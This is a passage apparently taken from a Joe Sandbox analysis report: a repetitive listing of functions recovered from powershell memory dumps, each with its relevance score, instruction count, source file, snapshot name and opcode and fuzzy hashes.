                                                                            • Instruction Fuzzy Hash: 153194B4A402059FD744DBA4D855ABE7BB3EF85300F11C4B9D511AB395DA34AD40CFA1
                                                                            Function 02EFE049 Relevance: .1, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96b800b6321732fd92e777a57bff59337d7dafe5c2298e231b68c9128453f40c
                                                                            • Instruction ID: 471f40c5a740aa26878e73d942d50c33591d4b9ba1eb955d3e8b09f5b156a071
                                                                            • Opcode Fuzzy Hash: 96b800b6321732fd92e777a57bff59337d7dafe5c2298e231b68c9128453f40c
                                                                            • Instruction Fuzzy Hash: D7316D34A402048FCB54DF69D468AEEBBF6FF49314F04956AD406EB360DB31AC81CB91
                                                                            Function 02EFAE70 Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30efcf21d20219319e31b35240c242a74719457a447cc540f3f6e98a8e5ced3b
                                                                            • Instruction ID: 38b7f771a1c7278dc9810e025792795b1cbb71be9380ec069e106255485dcc80
                                                                            • Opcode Fuzzy Hash: 30efcf21d20219319e31b35240c242a74719457a447cc540f3f6e98a8e5ced3b
                                                                            • Instruction Fuzzy Hash: D8314CB1A402099FDB44DFA9D4947AEBBF7AF88304F119039E909EB354EB349C418F61
                                                                            Function 02EF93F0 Relevance: .1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 576140df1dd9aa68b4f6c41453e104c46eac630238c59f5ad5add57a98cefcd7
                                                                            • Instruction ID: b05e12f8e010a9db2d2493b9a192f21599020eeb00af2a28618c621dc5509867
                                                                            • Opcode Fuzzy Hash: 576140df1dd9aa68b4f6c41453e104c46eac630238c59f5ad5add57a98cefcd7
                                                                            • Instruction Fuzzy Hash: 7C316B759017448EDBA0CF6AD4883DAFBF2EF88324F28C46ED58D97215D7745481CB61
                                                                            Function 02EFE058 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e579e30f7e21669f3ea6d360514f8e3637aed26ec02838b72f21aea22ee3b800
                                                                            • Instruction ID: 9293b1a3d68950cdc91d8df6fadf2a93c0076aec231f0fe4d164e4fa713c0b3c
                                                                            • Opcode Fuzzy Hash: e579e30f7e21669f3ea6d360514f8e3637aed26ec02838b72f21aea22ee3b800
                                                                            • Instruction Fuzzy Hash: FF314C74A402048FCB54DF69D568A9EBBF6FF89314F049569D406EB360DB31AC81CF90
                                                                            Function 02EFAD38 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56a9cb45b46d4a2cc72612a87dd93a444d9578251c66828efd8cb857fc68a41d
                                                                            • Instruction ID: 32c8d5511193902bf44d80043d3decccc5a1ec1eeb4899b27899bfb9d59e39af
                                                                            • Opcode Fuzzy Hash: 56a9cb45b46d4a2cc72612a87dd93a444d9578251c66828efd8cb857fc68a41d
                                                                            • Instruction Fuzzy Hash: 093150B4E402099FDB44EFA4D854AAE77B3EFC4300F1094B8E615AB395DA35AD018FA0
                                                                            Function 02E7F3D8 Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c4734b58baef4ff4a7cc97feec49787270733acf188ca1c7afb2757d3a6a8538
                                                                            • Instruction ID: c7292f0ddb5214bf1bd6acbd31d1b11c76789dba29ae5fa781ab7ae8fe0d7143
                                                                            • Opcode Fuzzy Hash: c4734b58baef4ff4a7cc97feec49787270733acf188ca1c7afb2757d3a6a8538
                                                                            • Instruction Fuzzy Hash: 12212172644200EFCF05CF14D9C0B26BBA5FB88328F24C5ADE9094A656D33AD856CBA1
                                                                            Function 02E7F02C Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69f7590bcec050a58f0a38b35b33c31a3a7fca79a7cf63babf2c258d78c7507e
                                                                            • Instruction ID: 9e236e43bad17d21e31d57691f118ce147eedae12a4e92c93bd2aa2effe16bf1
                                                                            • Opcode Fuzzy Hash: 69f7590bcec050a58f0a38b35b33c31a3a7fca79a7cf63babf2c258d78c7507e
                                                                            • Instruction Fuzzy Hash: D1214675544200DFDB11DF24D9C0B26BFA5FB98328F24C96DD80A4B746C33AD806CB61
                                                                            Function 02EF9400 Relevance: .1, Instructions: 69COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1011c48907a4b9f6c9ee8a24a8ae6cef60160f4c7bbe2b1f2319e991351c257
                                                                            • Instruction ID: 7b42f00b4d287c0884abf8092970f12ce0b76c231ef07aae19e412c2acf7d271
                                                                            • Opcode Fuzzy Hash: a1011c48907a4b9f6c9ee8a24a8ae6cef60160f4c7bbe2b1f2319e991351c257
                                                                            • Instruction Fuzzy Hash: C8217A719017448FDBA0CF6AC48838AFBF6EF98314F28C46ED98D97246D7746481CB61
                                                                            Function 02EFE318 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: acd161dc0561bdc53ac3d8adbcd0113e09c97cc076cdf9272e5bf5c55e4e8682
                                                                            • Instruction ID: e0dcbbf7f0c21aac13555a6e2f37c8eff47a5d748be113cafdb96160900252cc
                                                                            • Opcode Fuzzy Hash: acd161dc0561bdc53ac3d8adbcd0113e09c97cc076cdf9272e5bf5c55e4e8682
                                                                            • Instruction Fuzzy Hash: 7711AF769053498FCB10CF99D908BEAFFF4EF49724F18805AD508A7251D738A544CBA1
                                                                            Function 02EF7664 Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 31495fc2a9b9d34250bcef2918a26e4e0d764a1482765680040ba6ef01a132e6
                                                                            • Instruction ID: 860464b1c5d58c8a6a41d7e43077f203f2ad7d932ab47b8cd548eced1a935f03
                                                                            • Opcode Fuzzy Hash: 31495fc2a9b9d34250bcef2918a26e4e0d764a1482765680040ba6ef01a132e6
                                                                            • Instruction Fuzzy Hash: F11119797001188FCB04DBA8E844AEDB7F6EBCC355B0580A4E609DB354DB35DD169BA0
                                                                            Function 02E7F3D3 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction ID: ff5831eaaa65f22c33eb0753727f3855b22de11f2dd8333a83a1b36273814861
                                                                            • Opcode Fuzzy Hash: eaff4d4d8c6e34b4058e19faa77ca919cd1e0f201f98fea8a2ce0d2c05b1599f
                                                                            • Instruction Fuzzy Hash: B821CD76544240DFCF06CF10D9C4B16BF72FB88318F24C5A9D9094A656C33AD46ACB91
                                                                            Function 02E7F027 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction ID: d9a5f1a995aad9abfac243fa659603045f6f907734432ea2e6410f4d1be1f782
                                                                            • Opcode Fuzzy Hash: 830c0005bd04e393eb66fdf438895feacf4c0dff57886c80d0ed017cd194275d
                                                                            • Instruction Fuzzy Hash: 6711DD7A544280CFCB12CF14D5C4B15BFA1FB84328F28C6AED8094BB56C33AD44ACB61
                                                                            Function 02EFBCE0 Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 493fe4d62fc83de64594a139af9c7da5f72400bd60381a07776397866d9dd028
                                                                            • Instruction ID: 61b67f3b5854b4a03bad50b76e0cacdfa2de4967edc0860669bee7b54df5b82a
                                                                            • Opcode Fuzzy Hash: 493fe4d62fc83de64594a139af9c7da5f72400bd60381a07776397866d9dd028
                                                                            • Instruction Fuzzy Hash: E30122316083448FC754CB79D894A9ABFE0EF46214B1488EEE04AC76A2CB31EC41C700
                                                                            Function 02EFDCD9 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 17ddece9af3242f6d5bb1cdc8ebd67877742b15ef50f079e4d0a70da4f1c04b2
                                                                            • Instruction ID: c46332e64e50894c9c6624306a690162436203661dfc98eb037d148d2e69e750
                                                                            • Opcode Fuzzy Hash: 17ddece9af3242f6d5bb1cdc8ebd67877742b15ef50f079e4d0a70da4f1c04b2
                                                                            • Instruction Fuzzy Hash: 7901F136B150449BCB45CAB8EC145E8BFA2EB8A225B14D4BAD605D7201DA324C01CBE0
                                                                            Function 02EFE328 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8aa35ce82da52676c07ddc4153efc85285ed22674db7aa388213e1717bb98f43
                                                                            • Instruction ID: 0e45f285fd2cf1167190af124d3615596d4b7328a6086e9ed7183b9d8a240d3e
                                                                            • Opcode Fuzzy Hash: 8aa35ce82da52676c07ddc4153efc85285ed22674db7aa388213e1717bb98f43
                                                                            • Instruction Fuzzy Hash: 5B116A76901309CFDB50CF9ACA08B9EBBF4EB48714F28806DD508A7251D339A540CBA5
                                                                            Function 02EF79AA Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce3693a8f95a3e64dd59471414ff974351e176fb8cdc59f2da7953b4bb28c76b
                                                                            • Instruction ID: 5785172bc7b36a2f681cde0bfb421c066b7b8713b59e1f40d7650dbdbe88eee0
                                                                            • Opcode Fuzzy Hash: ce3693a8f95a3e64dd59471414ff974351e176fb8cdc59f2da7953b4bb28c76b
                                                                            • Instruction Fuzzy Hash: E30147327002408FC785CF78D954A6E7FF6EB89225B0159AEE50AD7610DB319D00C710
                                                                            Function 07643E11 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2155631166.0000000007640000.00000040.00000800.00020000.00000000.sdmp, Offset: 07640000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_7640000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e865fb85255a0173cf9df2841b0d53998d60cc913cc1d479ff60f1d535d2bfbd
                                                                            • Instruction ID: 7bc8c3a2a3d5d0f23ec42dd27ec9b9d5432ae0d5241c628f7b2f8d0cb5980a40
                                                                            • Opcode Fuzzy Hash: e865fb85255a0173cf9df2841b0d53998d60cc913cc1d479ff60f1d535d2bfbd
                                                                            • Instruction Fuzzy Hash: 6E0147F2B020915BC725127C080215EAB128FD2B28F1001A7CD03AF386CF389D0287EB
                                                                            Function 02EFDE98 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a06dc61d51f1a3e5056b968100adc9591f478ca4e9643d3e5b5a45576156673
                                                                            • Instruction ID: a1f7eacfe740839522b8f185e80386c4351379160e5f8c170943539d5197c406
                                                                            • Opcode Fuzzy Hash: 9a06dc61d51f1a3e5056b968100adc9591f478ca4e9643d3e5b5a45576156673
                                                                            • Instruction Fuzzy Hash: 10015235B012149FCB119B74E8086AEBBF6FB89315F144069E55AD3341DB355D11CB91
                                                                            Function 02EFDFD0 Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16fc0bac4664c6630929d6c2a9f61be3ce31d8ababc21324dffec2609188bfe6
                                                                            • Instruction ID: d48e256fd112e506f0ff124524cc1d68b8d76911d04e95ac5e7452faf29b9600
                                                                            • Opcode Fuzzy Hash: 16fc0bac4664c6630929d6c2a9f61be3ce31d8ababc21324dffec2609188bfe6
                                                                            • Instruction Fuzzy Hash: 711105342047508FC768DF75D08086ABBF6EF8921976489ADD48A8B7A0DB36FC41CB50
                                                                            Function 02EFBF10 Relevance: .0, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7f3e8e64876f21749646982acf660aa7f822643d11c2771fe87fcae01c4931a2
                                                                            • Instruction ID: 81ecd8d8679c1dfb7d50bf47702931db5b105116c7ed01e1a9f73fdba8a0dde4
                                                                            • Opcode Fuzzy Hash: 7f3e8e64876f21749646982acf660aa7f822643d11c2771fe87fcae01c4931a2
                                                                            • Instruction Fuzzy Hash: F5F0C8323093A01FD7114A79AC549B7BFE9DF86561705407BF944C73A1CA70CD0487A0
                                                                            Function 02E7D005 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6427265e20e74d960ac9fa56356bd4d6781e438de159c94b254ad6fb12497f7
                                                                            • Instruction ID: 64564e9ce9fdec952f07c80df47f14291a99f5b61a2e0f3d804e5e6371cc60b8
                                                                            • Opcode Fuzzy Hash: e6427265e20e74d960ac9fa56356bd4d6781e438de159c94b254ad6fb12497f7
                                                                            • Instruction Fuzzy Hash: CF01E96244E3C09ED7128B258D94B52BFB8DF53228F1DC1DBE9888F1A7C2695849C772
                                                                            Function 02E7D01D Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4780f6d2b848e669228519bc2039138bc2866ff6305ae5c0789e8e0ad2dd4725
                                                                            • Instruction ID: 068eb4b020b3d370aef31aa526905700a51b498e00071a0c83f8dab558fe0658
                                                                            • Opcode Fuzzy Hash: 4780f6d2b848e669228519bc2039138bc2866ff6305ae5c0789e8e0ad2dd4725
                                                                            • Instruction Fuzzy Hash: 6201D6714453449AEB218A2ACDC4B67FF98DF42338F1CE41AED494B246C7799941C6B1
                                                                            Function 02EFDC88 Relevance: .0, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b87dfc58c9300cb317415e2342de26e8ccfcbdf65cd2f2ed4c99abbb86c9d50
                                                                            • Instruction ID: f9cf44835d797a7f44dbad83b457774978128d129f24e77fa768187698b9f3b7
                                                                            • Opcode Fuzzy Hash: 6b87dfc58c9300cb317415e2342de26e8ccfcbdf65cd2f2ed4c99abbb86c9d50
                                                                            • Instruction Fuzzy Hash: F2F0E9367456245BC612565DBC104EF7F6ADDC72B130085A7E309C7500DE115D0483E1
                                                                            Function 02EF90D8 Relevance: .0, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88898ea5591d227609c4c60308414936ee4d80b4b460a7671d039b2a37707bdf
                                                                            • Instruction ID: d6ffe11e0a5dd313af056d21a02e29212f9f70ade38add0c597b716239e6d423
                                                                            • Opcode Fuzzy Hash: 88898ea5591d227609c4c60308414936ee4d80b4b460a7671d039b2a37707bdf
                                                                            • Instruction Fuzzy Hash: 43F04C366046048BD702AB74D4043EBBBA2EFC1354F5081BBDA058B396CD3A6806CBE1
                                                                            Function 02EF7940 Relevance: .0, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 249221f531201d73138a3b9f62b029f24a00ca2ae76646161975823a5acf3f82
                                                                            • Instruction ID: fcde2802e8a4d91d3c5e953fc5e840c6bd2ff0afec51830f07e3e42fca69d100
                                                                            • Opcode Fuzzy Hash: 249221f531201d73138a3b9f62b029f24a00ca2ae76646161975823a5acf3f82
                                                                            • Instruction Fuzzy Hash: C7F022316053019FC3019B79E948DAE7FF5EF892217050A6EE00AC7651DB305C81C720
                                                                            Function 02E7D9A7 Relevance: .0, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30349a7c1999ab6650d9cd946e30f2867fb1ea22e23c34260aed68fcabf0c865
                                                                            • Instruction ID: 6533845e656f7f22e98f3d638c400f3ae3ed5e97a7147a1474f24086002456a4
                                                                            • Opcode Fuzzy Hash: 30349a7c1999ab6650d9cd946e30f2867fb1ea22e23c34260aed68fcabf0c865
                                                                            • Instruction Fuzzy Hash: D2F0F976200600AF97618F0ADD85C23FBADEFD4674719C55AE84A4B716C771EC41CAA0
                                                                            Function 02EF9158 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b92fc88be94f7b8b57a7cd21dcea74c3b953848a1cefb1f5208e1219855eda6b
                                                                            • Instruction ID: 5f266309a450ce99407564f04bae528948a89a25c1123e73fead481eb18ea88b
                                                                            • Opcode Fuzzy Hash: b92fc88be94f7b8b57a7cd21dcea74c3b953848a1cefb1f5208e1219855eda6b
                                                                            • Instruction Fuzzy Hash: AEF0B4715063504FC3519F78E8983DABFA5FB01310F44846AE28DC7241DB3869418B91
                                                                            Function 02EFDE38 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1f75ef67eaf19699cac4ff98c260ac347a840a682d6706dc9ec5c7a01d1b8e52
                                                                            • Instruction ID: 5e1a32176089098642e8c8e6a5769856ab0dfc7964f4af2df545a170380abe3c
                                                                            • Opcode Fuzzy Hash: 1f75ef67eaf19699cac4ff98c260ac347a840a682d6706dc9ec5c7a01d1b8e52
                                                                            • Instruction Fuzzy Hash: 8EF05E357041408FC3108B1DD8548B6BBF9EFCA62931910DAE584CB732DA61DC11CB91
                                                                            Function 02E7D998 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138575978.0000000002E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E7D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e7d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 458fdd44ee367dbb445ee6a6d429ecb3b78d6a27058af50b69ea8a3d5435ea64
                                                                            • Instruction ID: 39d84c4f53fd21fbe20ef139b0db4586ea3b95aab5791c7b2892a92490de164a
                                                                            • Opcode Fuzzy Hash: 458fdd44ee367dbb445ee6a6d429ecb3b78d6a27058af50b69ea8a3d5435ea64
                                                                            • Instruction Fuzzy Hash: 30F0F976100640AFD765CF06CD85D23BBB9EFC5624B19C489A84A5B312C771FC42CBA0
                                                                            Function 02EF896A Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ed4894955348b9f0e7031b4320167b0f51d56cb93ad80393b0ecf04ab34e08a
                                                                            • Instruction ID: 979fd4e1033ed7494b74144d61435c0684b2b44a76b7631c0a66337afd75cd7b
                                                                            • Opcode Fuzzy Hash: 0ed4894955348b9f0e7031b4320167b0f51d56cb93ad80393b0ecf04ab34e08a
                                                                            • Instruction Fuzzy Hash: 45F0A7363097545BC70A2774E81C2AD7B66FBC5725F0480ABE64987242DF684D0587E5
                                                                            Function 02EF7950 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2138926556.0000000002EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EF0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2ef0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 36c24cf6bd91c2eee9cf28acc252695df483fa584c3b8c76f24b593618eb08d1
                                                                            • Instruction ID: cb3a17bad424b088ced5d6be82e155ca55b3648fdaa30ab9a86e7817eae988e2
                                                                            • Opcode Fuzzy Hash: 36c24cf6bd91c2eee9cf28acc252695df483fa584c3b8c76f24b593618eb08d1
                                                                            • Instruction Fuzzy Hash: 2AF0A7727007149FC750965AE844AAFBBEAEB8C261B40592DF10AD3740DF71AD418764
